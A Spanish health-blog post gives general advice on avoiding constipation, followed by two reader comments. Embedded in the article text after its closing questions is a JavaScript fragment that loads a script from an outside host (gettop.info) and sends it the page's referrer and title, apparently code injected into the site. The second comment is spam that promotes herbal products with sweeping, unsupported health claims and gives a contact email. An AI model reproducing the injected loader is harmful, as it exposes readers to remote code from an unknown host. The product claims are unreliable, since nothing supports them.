Salud y belleza » Alimentación, Bienestar, Dieta, Salud

Recomendaciones para evitar el estreñimiento

2 Comentarios

estreñimientoEl estreñimiento se produce cuando hay menos de tres deposiciones a la semana, o eso es lo que dicen la Fundación Española del Aparato Digestivo y la Organización Mundial de Gastroenterología.

Este problema llega a afectar a más de un 15% de la población, principalmente mujeres. Normalmente lo padecen más las personas que viven en la ciudad, mientras que los que viven en el campo van más al baño. A pesar de que no sea mortal, puede llegar a suponer problemas graves, además del deterioro de la calidad de vida de quien lo padece.

estreñimiento-dietaPara evitar padecer estreñimiento lo primero que hay que hacer es modificar los hábitos alimenticios. Una hidratación adecuada es importante. También hay que aumentar el consumo de fibra diaria, hacer ejercicio y cuando nos llame nuestro cuerpo no dejar de ir al baño, puesto que aguantarse es malo. Una buena dieta incluye productos de huerta, verduras y fruta y se debe reducir el consumo de grasas animales y platos procesados y embutidos.

Existen medicamentos que pueden causar estreñimiento. Por ello hay que evitar automedicarse y acudir al médico en el momento en el que notemos estos síntomas.

Otros consejos que pueden ayudarte a combatir el estreñimiento son buscar un horario fijo y tranquilo para evacuar y hacerlo tranquilamente, sin prisas. Dejar de fumar también puede servir y practicar algún tipo de ejercicio físico.

El correcto flujo de nuestro tránsito intestinal nos ayudará a sentirnos mejor, a estar menos hinchados e irritables y más tranquilos. Son sencillos pasos que pueden aumentar tu calidad de vida diariamente.

¿Tienes o has tenido estreñimiento? ¿Cómo lo combates? ¿Te funcionan estas técnicas?s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , ,

2 Comments »

  • Sofía said:

    Yo no sé por qué pero a veces no puedo ir al baño en una semana entera. Muchas veces no tengo tiempo y la verdad es que me duele mucho la barriga. Lo que hago es comer varias noches All Bran Choco porque me encanta y además comer kiwi, ciruelas… A mi me funciona.

  • Jaime Hinostroza said:

    Si el Trastorno Digestivo lamentablemente implica una Constipación ó ESTREÑIMIENTO severo, crónico ó Extremádamente Fármacoresistente, los resultados terapeúticos de las acertadas recomendaciones que se indican en este artículo …serían mas que satisfactorias si se complementase con una magistral Fórmula Herbodietética denominada RGX1 (innovadora Infusión que resulta de la combinación de varios Extractos Herbales: Anís + Tamarindo + Té Verde y Xantán) con sorprendentes Propiedades Laxantes y Digestivas, siendo sumamente eficáz para prevenir/mitigar/inhibir y combatir naturalmente esta temible Patología Digestiva; cabe precisar que ésta Formulación Biológica .. es altamente inócua dado de que NO contiene Aspartame, Caseína, Lactosa, Gluten, colorantes ni componentes dañinos y/ó tóxicos; No esta demás también tener en cuenta …que a pesar de su creciente demanda, éste Producto -por el momento- solo se le encuentra formalmente disponible en el Perú y en algunos otros Países (en todos ellos tiene sus respectivas Certificaciones Sanitarias); Ojo…que luego de haberse regularizado el adecuado tránsito intestinal así como la buena digestión, el siguiente paso es equilibrar, desintoxicar, nutrir, regenerar e inmunizar la Flora intestinal,… a partir de ésta fase es el momento propicio para que actúe el complemento ideal del RGX1: .. el RGX2 (pura Fibra Prebiótica + Probióticos + Vitaminas + Minerales); Si alguna persona desea ampliar esta saludable información, escribir a: prolife.online@hotmail.com (dar como referencia éste Portal y especificar la Ciudad/País de donde escribe); Desde Lima-Perú: Jaime Hinostroza / PROLIFE BIOTECH /

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.